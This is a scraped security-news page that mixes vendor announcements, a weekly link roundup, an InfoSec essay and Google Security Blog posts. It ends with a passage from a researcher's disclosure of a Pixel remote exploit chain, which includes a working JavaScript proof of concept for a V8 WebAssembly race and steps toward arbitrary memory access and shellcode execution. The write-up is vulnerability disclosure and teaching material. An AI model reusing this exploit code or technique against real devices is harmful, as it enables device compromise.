("Can't I just do some *work* instead??"). What's different now as compared to 25 years ago is the availability of so much more information via the internet.  Expertise and knowledge are more accessible than ever.  You can learn more easily, make industry connections, and make a name for yourself by sharing knowledge and helping others via platforms such as Twitter. Oh, and make sure you subscribe to my "Smashing Security" podcast.       

AlienVault USM Anywhere ISMS is Now Certified to ISO 27001:2013

No timestamp info...
I’m pleased to announce that AlienVault’s USM Anywhere Information Security Management System (ISMS) is certified to ISO 27001:2013 by an accredited certification body. This certification underscores our commitment to providing effective threat detection and rapid incident response capabilities in a secure cloud environment. Our certification process was led by Coalfire ISO, Inc., an ISO/IEC 27001 Certification Body accredited by the ANSI-ASQ National Accreditation Board (ANAB). The scope of this certification includes the following: the development and implementation of a rigorous security program, which includes the development and implementation of an ISMS for the AlienVault Unified Security Management® (USM) product offering, which includes USM Anywhere™ and USM Central™. About ISO/IEC 27001:2013 The ISO/IEC 27001 family of standards define a global standard for information security management. These standards outline the best practices and security controls required for a strong information security program, one that protects sensitive company information. The standards are comprehensive, spanning the people, processes, and IT systems involved in an organization’s security program. The sensitive information covered in ISO 27001 includes any data entrusted by third parties. For a SaaS security provider like AlienVault, this means that, in order for USM Anywhere to be compliant with ISO 27001:2013, we had to demonstrate how we secure, transmit, and store data on behalf of our customers. Having this certification gives our customers extra assurance that we are securely handling their sensitive security-related data. Like our compliance certifications for PCI DSS, SOC 2 Type 2, and an attestation of HIPAA compliance, our successful completion of a third-party audit and compliance certification for ISO 27001:2013 tells our customers that we are doing exactly what we say we are doing—that we maintain robust security controls to continually support and protect your data as well as our own. We’ve Been Drinking Our Own Champagne Again Last year, when AlienVault achieved compliance certifications and attestations for PCI DSS, SOC 2, and HIPAA, I described how we used the AlienVault USM Anywhere service in house to demonstrate our compliance. We did the same for our ISO 27001:2013 certification. While it’s not mandated that a security solution provider use its own product for its internal security and compliance programs, I do think it is important that you “drink your own champagne,” (or, as I noted in the previous blog, “eat your own dog food.”) With the USM Anywhere service offering, our compliance officer was able to readily walk auditors through many of the key security controls outlined in ISO 27001:2013. Because the platform has many out-of-the-box compliance features, including pre-built reports and custom data views, it makes it simple and fast to navigate an audit process. For customers on their own compliance path for ISO 27001:2013 certification, AlienVault USM can help to cut through the complexity and uncertainty of the audit. How ISO 27001:2013 Sets the Stage for the GDPR At AlienVault, we haven’t been shy about the fast-approaching deadline (May 25, 2018) for the EU General Data Protection Regulation (GDPR). You can watch a recent webcast I gave on the GDPR here. While there is no official compliance certification program for the GDPR, organizations need a way to assess their GDPR readiness. Having an established ISMS has been identified as a great starting point for organizations to provide evidence of their compliance with the GDPR. In short, by following ISO 27001:2013 process, organizations (AlienVault included) can set the stage for creating a GDPR-compliant environment. See how AlienVault USM can help you to meet your security and IT compliance goals faster. Test drive our free trial today.       

Things I Hearted this Week 2nd March 2018

No timestamp info...
This week London has been in the midst of snowmageddon! An inch of snow ground the city to a halt with schools closed and the capital on red alert. Fortunately, one of the perks of working from home is that I get to stay on top of the security news regardless of the weather, so put on your snow boots and jump right in. Trading stocks in the wake of breaches The US securities and Exchange Commission (SEC) has waned high-ranking executives not to trade stocks before disclosing beaches, major vulnerabilities and other cybersecurity related incidents. SEC statement on public company cybersecurity disclosure (PDF) | SEC After Intel & Equifax Incidents, SEC Warns Execs Not to Trade Stock While Investigating Security Incidents | Bleeping Computer Tracking your sold hardware Many devices now come with tracking features to help you find it if it gets lost or stolen. It started predominantly with phones, but now is in most laptops, desktops, and plenty of smart devices. The trouble is that location tracking isn’t something we intuitively ask for when buying or selling an item. We just assume that the seller has disabled it, or it wasn’t enabled in the first place. Will we get to a point where before buying a smart teddy, a kid will ask if its been factory-wiped and all credentials removed? How I sold an old Mac and unknowingly had access to its location for over 3 years | Bredon Mulligan / Medium Cover your own assets John Carroll wrote an interesting blog post on influencing business layers that might not get infosec. Cover your own ass(ets) | CTU Security Cybersecurity Style Guide How many times have you wished you had a cybersecurity style guide to help you understand how to pronounce security phrases, or write a word, or the definitive meaning of a term. Well, your wishes have all been answered as Bishop Fox has created a style guide for you. Web Semantics: The Bishop Fox Cybersecurity Style Guide | Wired Download the Bishop Fox Cybersecurity Style Guide (PDF) | Bishop Fox Revenge Hacking Well, at least the motive was easy to establish. Man admits hacking former employer’s computer system for revenge | Hackread Teach a man to Phish… on second thoughts The NCSC posted a somewhat polarising post on the trouble with phishing. While it raises some good points about the limitations of phishing and how user awareness is one layer among many to protect organisations. It does make some broad assumptions and makes user awareness sound almost futile. The Trouble with Phishing | NCSC The market is taking a slightly different view, with a number of acquisitions in the user awareness space in recent months. I wrote a recap over at my blog. The user awareness landscape | J4vv4D Phish of the week Apple: Watch out for this new scam that steals your credit card details | Newsweek How to hack any Facebook account A nice writeup on how researcher Anand Prakash found a vulnerability in Facebook that allowed access to any account, which earned him a $15k bounty. It relied on the fact that you could reset a Facebook password with a 6 digit code that could be brute-forced as there wasn’t a rate limit. I figured out a way to hack any of Facebook’s 2 billion accounts, and they paid me a $15,000 bounty for it | AppSecure In other Facebook news. Facebook’s mandatory malware scan is an intrusive mess | Wired Influencing Security Policy Instead of criticizing cybersecurity policy, Robert Knake has some advice on how you can more effectively influence it. To Build a More Capable Cyber Policy Field, Teach Policy to Technologists | CFR What are the benefits of ISO27001? ISO27001, the cornerstone of most security programmes. But what are the benefits and how can you make it work? Fortunately, Brian Honan is a man that knows a thing or two about the ISO standard they call 27001 and shares his wisdom. Business benefits for ISO 27001 certification, and five steps to making it work | BH Consulting Somewhat related because Brian helped me put this together a few years ago THE CYNIC’S GUIDE TO ISO27001 | J4vv4D Random assortment of news Why I Quit Google to Work for Myself | Michael Lynch Ad network uses advanced malware technique to conceal CPU-draining mining ads | Ars Technica Deception Technology: Worth the Investment? | Bank info security US Supremes take a look at Microsoft's Irish email slurp battle, and yeah, not a great start | The Register       

What We Lack Most in InfoSec: Inherited Credibility

No timestamp info...
Ask any InfoSec person the following question: What do you lack most in your job? Can you predict the answers?  Of course you can.  Most InfoSec folks will answer that they lack money, and resources (also known as “people”).  Some of the more creative types will also mention that they lack time. These are all good answers, but they don’t answer the question.  These answers indicate what most InfoSec people need, rather than what they lack.  What we lack in the InfoSec community is exactly what will allow us to fulfill those needs. I was listening to a recent Lawfare podcast.  This episode featured a speech given by Chuck Rosenberg to law students at University of Virginia law school.  If you are unfamiliar with Chuck Rosenberg, he served as Chief Of Staff at the FBI under James Comey, as well as counselor to FBI Director Robert Mueller.  Mr. Rosenberg has an impressive history.  His speech was about leadership, but he mentioned something that made me consider the question “what do we lack most in InfoSec?” Take the following scenario as an example.  An attorney for the Eastern District of the United States stands before a court, ready to present a case.  Once the court is called to order, the attorney introduces himself.  He will customarily stand, and say: “Chuck Rosenberg, on behalf of the United States of America.” Those words have implied power.  Not because it is Chuck Rosenberg saying them.  There is much more to it; those words carry inherited credibility.  Their power is derived from a storied institution of power. Inherited credibility is what we lack most in InfoSec.  You can be the world’s most elite hacker, capable of popping a shell faster than anyone else in town, but you will only get odd stares if you walk into the CEO’s office boasting of that credential.  Most corporate cyber positions, from the security analyst, all the way up to the CISO, simply do not carry any inherited credibility.  This is mostly due to the newness of cybersecurity positions in most organizations.  We may still be quite a distance from creating an inheritable empire.  According to a February 2018 report by the Council of Economic Advisers, there is still no common lexicon for categorizing malicious cyber activities.  This is especially true when discussing cybersecurity events.  If we have yet to develop a common language, we are still too far off from closing the credibility gap. We may currently lack inherited credibility, but this puts us in a unique position, as we are the trailblazers who can build that inheritance for our successors.  If, however, you are working in InfoSec for your own self-aggrandizement, then you are sadly on a path to failure, but that is a broader subject. Inherited credibility is what will move us from need to surplus.  (Perhaps “surplus” is a bit too optimistic, but you get the point.)  The more important question you can ask yourself every day is:  How can I build the credibility that will give my successors the power to continue to grow this meaningful work?       

Failed to get content from ''
Sorry, the feed is not available at this time.
Failed to get content from ''
Failed to get content from ''
Failed to get content from ''

Google Online Security Blog

The latest news and insights from Google on security and safety on the Internet.

Last feed update: Saturday March 17th, 2018 03:00:02 PM

Android Security 2017 Year in Review

Thursday March 15th, 2018 01:00:42 PM
Posted by Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOSOur team’s goal is simple: secure more than two billion Android devices. It’s our entire focus, and we’re constantly working to improve our protections to keep users safe.Today, we’re releasing our fourth annual Android Security Year in Review. We compile these reports to help educate the public about the many different layers of Android security, and also to hold ourselves accountable so that anyone can track our security work over time.We saw really positive momentum last year and this post includes some, but not nearly all, of the major moments from 2017. To dive into all the details, you can read the full report at: Play ProtectIn May, we announced Google Play Protect, a new home for the suite of Android security services on nearly two billion devices. While many of Play Protect’s features had been securing Android devices for years, we wanted to make these more visible to help assure people that our security protections are constantly working to keep them safe.Play Protect’s core objective is to shield users from Potentially Harmful Apps, or PHAs. Every day, it automatically reviews more than 50 billion apps, other potential sources of PHAs, and devices themselves and takes action when it finds any.Play Protect uses a variety of different tactics to keep users and their data safe, but the impact of machine learning is already quite significant: 60.3% of all Potentially Harmful Apps were detected via machine learning, and we expect this to increase in the future.Protecting users' devicesPlay Protect automatically checks Android devices for PHAs at least once every day, and users can conduct an additional review at any time for some extra peace of mind. These automatic reviews enabled us to remove nearly 39 million PHAs last year.We also update Play Protect to respond to trends that we detect across the ecosystem. For instance, we recognized that nearly 35% of new PHA installations were occurring when a device was offline or had lost network connectivity. As a result, in October 2017, we enabled offline scanning in Play Protect, and have since prevented 10 million more PHA installs.Preventing PHA downloadsDevices that downloaded apps exclusively from Google Play were nine times less likely to get a PHA than devices that downloaded apps from other sources. And these security protections continue to improve, partially because of Play Protect’s increased visibility into newly submitted apps to Play. It reviewed 65% more Play apps compared to 2016.Play Protect also doesn’t just secure Google Play—it helps protect the broader Android ecosystem as well. Thanks in large part to Play Protect, the installation rates of PHAs from outside of Google Play dropped by more than 60%.Security updatesWhile Google Play Protect is a great shield against harmful PHAs, we also partner with device manufacturers to make sure that the version of Android running on users' devices is up-to-date and secure.Throughout the year, we worked to improve the process for releasing security updates, and 30% more devices received security patches than in 2016. Furthermore, no critical security vulnerabilities affecting the Android platform were publicly disclosed without an update or mitigation available for Android devices. This was possible due to the Android Security Rewards Program, enhanced collaboration with the security researcher community, coordination with industry partners, and built-in security features of the Android platform.New security features in Android OreoWe introduced a slew of new security features in Android Oreo: making it safer to get apps, dropping insecure network protocols, providing more user control over identifiers, hardening the kernel, and more.We highlighted many of these over the course of the year, but some may have flown under the radar. For example, we updated the overlay API so that apps can no longer block the entire screen and prevent you from dismissing them, a common tactic employed by ransomware.Openness makes Android security strongerWe’ve long said it, but it remains truer than ever: Android’s openness helps strengthen our security protections. For years, the Android ecosystem has benefitted from researchers’ findings, and 2017 was no different.Security reward programsWe continued to see great momentum with our Android Security Rewards program: we paid researchers $1.28 million dollars, pushing our total rewards past $2 million dollars since the program began. We also increased our top-line payouts for exploits that compromise TrustZone or Verified Boot from $50,000 to $200,000, and remote kernel exploits from $30,000 to $150,000.In parallel, we introduced Google Play Security Rewards Program and offered a bonus bounty to developers that discover and disclose select critical vulnerabilities in apps hosted on Play to their developers.External security competitionsOur teams also participated in external vulnerability discovery and disclosure competitions, such as Mobile Pwn2Own. At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel. And of the exploits demonstrated against devices running Android, none could be reproduced on a device running unmodified Android source code from the Android Open Source Project (AOSP).We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users.

Distrust of the Symantec PKI: Immediate action needed by site operators

Wednesday March 7th, 2018 11:26:59 PM
Posted by Devon O’Brien, Ryan Sleevi, Emily Stark, Chrome security teamWe previously announced plans to deprecate Chrome’s trust in the Symantec certificate authority (including Symantec-owned brands like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL). This post outlines how site operators can determine if they’re affected by this deprecation, and if so, what needs to be done and by when. Failure to replace these certificates will result in site breakage in upcoming versions of major browsers, including Chrome.Chrome 66If your site is using a SSL/TLS certificate from Symantec that was issued before June 1, 2016, it will stop functioning in Chrome 66, which could already be impacting your users.If you are uncertain about whether your site is using such a certificate, you can preview these changes in Chrome Canary to see if your site is affected. If connecting to your site displays a certificate error or a warning in DevTools as shown below, you’ll need to replace your certificate. You can get a new certificate from any trusted CA, including Digicert, which recently acquired Symantec’s CA business.An example of a certificate error that Chrome 66 users might see if you are using a Legacy Symantec SSL/TLS certificate that was issued before June 1, 2016. The DevTools message you will see if you need to replace your certificate before Chrome 66.Chrome 66 has already been released to the Canary and Dev channels, meaning affected sites are already impacting users of these Chrome channels. If affected sites do not replace their certificates by March 15, 2018, Chrome Beta users will begin experiencing the failures as well. You are strongly encouraged to replace your certificate as soon as possible if your site is currently showing an error in Chrome Canary.Chrome 70Starting in Chrome 70, all remaining Symantec SSL/TLS certificates will stop working, resulting in a certificate error like the one shown above. To check if your certificate will be affected, visit your site in Chrome today and open up DevTools. You’ll see a message in the console telling you if you need to replace your certificate.The DevTools message you will see if you need to replace your certificate before Chrome 70.If you see this message in DevTools, you’ll want to replace your certificate as soon as possible. If the certificates are not replaced, users will begin seeing certificate errors on your site as early as July 20, 2018. The first Chrome 70 Beta release will be around September 13, 2018.Expected Chrome Release TimelineThe table below shows the First Canary, First Beta and Stable Release for Chrome 66 and 70. The first impact from a given release will coincide with the First Canary, reaching a steadily widening audience as the release hits Beta and then ultimately Stable. Site operators are strongly encouraged to make the necessary changes to their sites before the First Canary release for Chrome 66 and 70, and no later than the corresponding Beta release dates.ReleaseFirst CanaryFirst BetaStable ReleaseChrome 66January 20, 2018~ March 15, 2018~ April 17, 2018Chrome 70~ July 20, 2018~ September 13, 2018~ October 16, 2018For information about the release timeline for a particular version of Chrome, you can also refer to the Chromium Development Calendar which will be updated should release schedules change.In order to address the needs of certain enterprise users, Chrome will also implement an Enterprise Policy that allows disabling the Legacy Symantec PKI distrust starting with Chrome 66. As of January 1, 2019, this policy will no longer be available and the Legacy Symantec PKI will be distrusted for all users.Special Mention: Chrome 65As noted in the previous announcement, SSL/TLS certificates from the Legacy Symantec PKI issued after December 1, 2017 are no longer trusted. This should not affect most site operators, as it requires entering in to special agreement with DigiCert to obtain such certificates. Accessing a site serving such a certificate will fail and the request will be blocked as of Chrome 65. To avoid such errors, ensure that such certificates are only served to legacy devices and not to browsers such as Chrome.

A secure web is here to stay

Thursday February 8th, 2018 08:05:23 PM
Posted by Emily Schechter, Chrome Security Product ManagerFor the past several years, we’ve moved toward a more secure web by strongly advocating that sites adopt HTTPS encryption. And within the last year, we’ve also helped users understand that HTTP sites are not secure by gradually marking a larger subset of HTTP pages as “not secure”. Beginning in July 2018 with the release of Chrome 68, Chrome will mark all HTTP sites as “not secure”.In Chrome 68, the omnibox will display “Not secure” for all HTTP pages.Developers have been transitioning their sites to HTTPS and making the web safer for everyone. Progress last year was incredible, and it’s continued since then:Over 68% of Chrome traffic on both Android and Windows is now protectedOver 78% of Chrome traffic on both Chrome OS and Mac is now protected81 of the top 100 sites on the web use HTTPS by defaultChrome is dedicated to making it as easy as possible to set up HTTPS. Mixed content audits are now available to help developers migrate their sites to HTTPS in the latest Node CLI version of Lighthouse, an automated tool for improving web pages. The new audit in Lighthouse helps developers find which resources a site loads using HTTP, and which of those are ready to be upgraded to HTTPS simply by changing the subresource reference to the HTTPS version.Lighthouse is an automated developer tool for improving web pages.Chrome’s new interface will help users understand that all HTTP sites are not secure, and continue to move the web towards a secure HTTPS web by default. HTTPS is easier and cheaper than ever before, and it unlocks both performance improvements and powerful new features that are too sensitive for HTTP. Developers, check out our set-up guides to get started.

Vulnerability Reward Program: 2017 Year in Review

Wednesday February 7th, 2018 09:00:35 PM
Posted by Jan Keller, Google VRP Technical Pwning MasterAs we kick-off a new year, we wanted to take a moment to look back at the Vulnerability Reward Program in 2017. It joins our past retrospectives for 2014, 2015, and 2016, and shows the course our VRPs have taken.At the heart of this blog post is a big thank you to the security research community. You continue to help make Google’s users and our products more secure. We looking forward to continuing our collaboration with the community in 2018 and beyond!2017, By the NumbersHere’s an overview of how we rewarded researchers for their reports to us in 2017:We awarded researchers more than 1 million dollars for vulnerabilities they found and reported in Google products, and a similar amount for Android as well. Combined with our Chrome awards, we awarded nearly 3 million dollars to researchers for their reports last year, overall.Drilling-down a bit further, we awarded $125,000 to more than 50 security researchers from all around the world through our Vulnerability Research Grants Program, and $50,000 to the hard-working folks who improve the security of open-source software as part of our Patch Rewards Program.A few bug highlightsEvery year, a few bug reports stand out: the research may have been especially clever, the vulnerability may have been especially serious, or the report may have been especially fun and quirky!Here are a few of our favorites from 2017:In August, researcher Guang Gong outlined an exploit chain on Pixel phones which combined a remote code execution bug in the sandboxed Chrome render process with a subsequent sandbox escape through Android’s libgralloc. As part of the Android Security Rewards Program he received the largest reward of the year: $112,500. The Pixel was the only device that wasn’t exploited during last year’s annual Mobile pwn2own competition, and Guang’s report helped strengthen its protections even further.Researcher "gzobqq" received the $100,000 pwnium award for a chain of bugs across five components that achieved remote code execution in Chrome OS guest mode.Alex Birsan discovered that anyone could have gained access to internal Google Issue Tracker data. He detailed his research here, and we awarded him $15,600 for his efforts.Making Android and Play even saferOver the course of the year, we continued to develop our Android and Play Security Reward programs.No one had claimed the top reward for an Android exploit chain in more than two years, so we announced that the greatest reward for a remote exploit chain--or exploit leading to TrustZone or Verified Boot compromise--would increase from $50,000 to $200,000. We also increased the top-end reward for a remote kernel exploit from $30,000 to $150,000.In October, we introduced the by-invitation-only Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play.Today, we’re expanding the range of rewards for remote code executions from $1,000 to $5,000. We’re also introducing a new category that includes vulnerabilities that could result in the theft of users’ private data, information being transferred unencrypted, or bugs that result in access to protected app components. We’ll award $1,000 for these bugs. For more information visit the Google Play Security Reward Program site.And finally, we want to give a shout out to the researchers who’ve submitted fuzzers to the Chrome Fuzzer Program: they get rewards for every eligible bug their fuzzers find without having to do any more work, or even filing a bug.Given how well things have been going these past years, we look forward to our Vulnerability Rewards Programs resulting in even more user protection in 2018 thanks to the hard work of the security research community.* Andrew Whalley (Chrome VRP), Mayank Jain (Android Security Rewards), and Renu Chaudhary (Google Play VRP) contributed mightily to help lead these Google-wide efforts.

Announcing turndown of the deprecated Google Safe Browsing APIs

Wednesday January 24th, 2018 10:22:38 PM
Posted by Alex Wozniak, Software Engineer, Safe Browsing TeamIn May 2016, we introduced the latest version of the Google Safe Browsing API (v4). Since this launch, thousands of developers around the world have adopted the API to protect over 3 billion devices from unsafe web resources.Coupled with that announcement was the deprecation of legacy Safe Browsing APIs, v2 and v3. Today we are announcing an official turn-down date of October 1st, 2018, for these APIs. All v2 and v3 clients must transition to the v4 API prior to this date.To make the switch easier, an open source implementation of the Update API (v4) is available on GitHub. Android developers always get the latest version of Safe Browsing’s data and protocols via the SafetyNet Safe Browsing API. Getting started is simple; all you need is a Google Account, Google Developer Console project, and an API key.For questions or feedback, join the discussion with other developers on the Safe Browsing Google Group. Visit our website for the latest information on Safe Browsing.

Android Security Ecosystem Investments Pay Dividends for Pixel

Thursday January 18th, 2018 06:26:18 PM
Posted by Mayank Jain and Scott Roberts, Android security team[Cross-posted from the Android Developers Blog]In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues. All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation. The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University. The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.Technical details of a Pixel remote exploit chainThe Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process. This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys). The RCE bug (CVE-2017-5116)New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access. The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time. i::wasm::ModuleWireBytes GetFirstArgumentAsBytes( const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) { ...... } else if (source->IsTypedArray()) { //--->source should be checked if it's backed by a SharedArrayBuffer // A TypedArray was passed. Local<TypedArray> array = Local<TypedArray>::Cast(source); Local<ArrayBuffer> buffer = array->Buffer(); ArrayBuffer::Contents contents = buffer->GetContents(); start = reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset(); length = array->ByteLength(); } ...... return i::wasm::ModuleWireBytes(start, start + length);}A simple PoC is as follows: <html><h1>poc</h1><script id="worker1">worker:{ self.onmessage = function(arg) { console.log("worker started"); var ta = new Uint8Array(; var i =0; while(1){ if(i==0){ i=1; ta[51]=0; //--->4)modify the webassembly code at the same time }else{ i=0; ta[51]=128; } } }}</script><script>function getSharedTypedArray(){ var wasmarr = [ 0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e, 0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65, 0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01, 0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b, 0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b]; var sb = new SharedArrayBuffer(wasmarr.length); //---> 1)put WebAssembly code in a SharedArrayBuffer var sta = new Uint8Array(sb); for(var i=0;i<sta.length;i++) sta[i]=wasmarr[i]; return sta; }var blob = new Blob([ document.querySelector('#worker1').textContent ], { type: "text/javascript" })var worker = new Worker(window.URL.createObjectURL(blob)); //---> 2)create a web workervar sta = getSharedTypedArray();worker.postMessage(sta.buffer); //--->3)pass the WebAssembly code to the web workersetTimeout(function(){ while(1){ try{ sta[51]=0; var myModule = new WebAssembly.Module(sta); //--->4)parse the WebAssembly code var myInstance = new WebAssembly.Instance(myModule); //myInstance.exports.getAnswerPlus1(); }catch(e){ } } },1000);//worker.terminate(); </script></html>The text format of the WebAssembly code is as follows: 00002b func[0]:00002d: 41 2a | i32.const 4200002f: 0b | end000030 func[1]:000032: 10 00 | call 0000034: 41 01 | i32.const 1000036: 6a | i32.add000037: 0b | endFirst, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread's bound check, the instruction " call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs. Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked. (func $leak(param i32 i32 i32 i32 i32 i32)(result i32) i32.const 0 get_local 0 i32.const 4 get_local 1 i32.const 8 get_local 2 i32.const 12 get_local 3 i32.const 16 get_local 4 i32.const 20 get_local 5 i32.const 0 ))Not only the instruction "call 0" can be modified, any "call funcx" instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript: /*Text format of funcx*/ (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32) get_local 5 get_local 4 i32.add)/*Disassembly code of funcx*/--- Code ---kind = WASM_FUNCTIONname = wasm#1compiler = turbofanInstructions (size = 20)0x58f87600 0 8b442404 mov eax,[esp+0x4]0x58f87604 4 03c6 add eax,esi0x58f87606 6 c20400 ret 0x40x58f87609 9 0f1f00 nopSafepoints (size = 8)RelocInfo (size = 0)--- End code ---When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If "call funcx" is modified to call the following JS_TO_WASM function. /*Disassembly code of JS_TO_WASM function */--- Code ---kind = JS_TO_WASM_FUNCTIONname = js-to-wasm#0compiler = turbofanInstructions (size = 170)0x4be08f20 0 55 push ebp0x4be08f21 1 89e5 mov ebp,esp0x4be08f23 3 56 push esi0x4be08f24 4 57 push edi0x4be08f25 5 83ec08 sub esp,0x80x4be08f28 8 8b4508 mov eax,[ebp+0x8]0x4be08f2b b e8702e2bde call 0x2a0bbda0 (ToNumber) ;; code: BUILTIN0x4be08f30 10 a801 test al,0x10x4be08f32 12 0f852a000000 jnz 0x4be08f62 <+0x42>The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows: /* ArrayBuffer layouts 40 Bytes*/ Map Properties Elements ByteLength BackingStore AllocationBase AllocationLength Fields internal internal /* Map layouts 44 Bytes*/ static kMapOffset = 0, static kInstanceSizesOffset = 4, static kInstanceAttributesOffset = 8, static kBitField3Offset = 12, static kPrototypeOffset = 16, static kConstructorOrBackPointerOffset = 20, static kTransitionsOrPrototypeInfoOffset = 24, static kDescriptorsOffset = 28, static kLayoutDescriptorOffset = 1, static kCodeCacheOffset = 32, static kDependentCodeOffset = 36, static kWeakCellCacheOffset = 40, static kPointerFieldsBeginOffset = 16, static kPointerFieldsEndOffset = 44, static kInstanceSizeOffset = 4, static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5, static kUnusedOffset = 6, static kVisitorIdOffset = 7, static kInstanceTypeOffset = 8, //one byte static kBitFieldOffset = 9, static kInstanceTypeAndBitFieldOffset = 8, static kBitField2Offset = 10, static kUnusedPropertyFieldsOffset = 11Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode. Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit. The EoP Bug (CVE-2017-14904)The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap: static int gralloc_map(gralloc_module_t const* module, buffer_handle_t handle){ …… private_handle_t* hnd = (private_handle_t*)handle; …… if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) && !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) { size = hnd->size; err = memalloc->map_buffer(&mappedAddress, size, hnd->offset, hnd->fd); //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process. if(err || mappedAddress == MAP_FAILED) { ALOGE("Could not mmap handle %p, fd=%d (%s)", handle, hnd->fd, strerror(errno)); return -errno; } hnd->base = uint64_t(mappedAddress) + hnd->offset; //---> save mappedAddress+offset to hnd->base } else { err = -EACCES;}…… return err;}gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. 